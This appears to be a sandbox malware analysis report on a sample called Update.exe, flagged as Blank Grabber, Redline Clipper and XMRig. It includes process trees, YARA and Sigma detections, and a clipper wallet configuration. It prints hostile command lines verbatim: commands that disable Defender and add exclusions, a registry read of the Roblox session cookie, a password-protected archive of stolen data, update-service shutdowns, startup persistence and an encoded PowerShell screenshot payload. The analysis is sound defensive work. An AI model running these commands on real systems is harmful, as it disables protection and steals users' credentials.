            • cvtres.exe (PID: 8784 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8256 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8344 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8432 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8492 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8632 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8732 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8804 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8856 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8876 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8936 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8952 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 9004 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 9048 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9160 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8456 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • nfblozsybbjy.exe (PID: 8652 cmdline: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe MD5: 1505B202551976B8543C4B233F50FCA8)
    • powershell.exe (PID: 8684 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8324 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 8932 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 8252 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8928 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8768 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8408 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 9000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8952 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 7640 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Redline Clipper

{"Wallet Addresses": ["14erhPhc9GWKjwxi1gULqjNxc7hMHUJhmb", "0x10216699882a3395893bbeb03745f444799be108", "DGTuLZSsUTFwHmFZJfwUXqUJXaihFjsRDa", "LiMPN75CmUKHNSGof6UEttikARmdEotvwW", "Xq8qJcE7zdgpWmizeh4kygqbK1t2AtmD9m", "4275Xju8vVcJP1RVqQbK2Z7GkZLGujw9JAXrN4DAkKTgeodnR4BTKauhEmWUJp3hsrKLEtey7vFHGFPp7yjeE8Q6QZVfkbP"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeJoeSecurity_RedlineClipperYara detected Redline ClipperJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1665851600.0000019DCB065000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000017.00000000.1700631224.0000000000972000.00000002.00000001.01000000.00000018.sdmpJoeSecurity_RedlineClipperYara detected Redline ClipperJoe Security
            00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000001.00000003.1978245137.000002D8F6B8A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  Click to see the 10 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  23.0.lf6o4T3T.exe.970000.0.unpackJoeSecurity_RedlineClipperYara detected Redline ClipperJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", ProcessId: 3192, ProcessName: cmd.exe
                    Sigma detected: Powershell Defender Disable Scan Feature
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 4340, ProcessName: cmd.exe
                    Sigma detected: Rar Usage with Password and Compression Level
                    Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *", ProcessId: 7636, ProcessName: cmd.exe
                    Sigma detected: Suspicious Encoded PowerShell Command Line
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Sigma detected: Suspicious PowerShell Encoded Command Patterns
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5296, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7136, ProcessName: powershell.exe
                    Sigma detected: Suspicious Startup Folder Persistence
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Update.exe, ProcessId: 1184, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC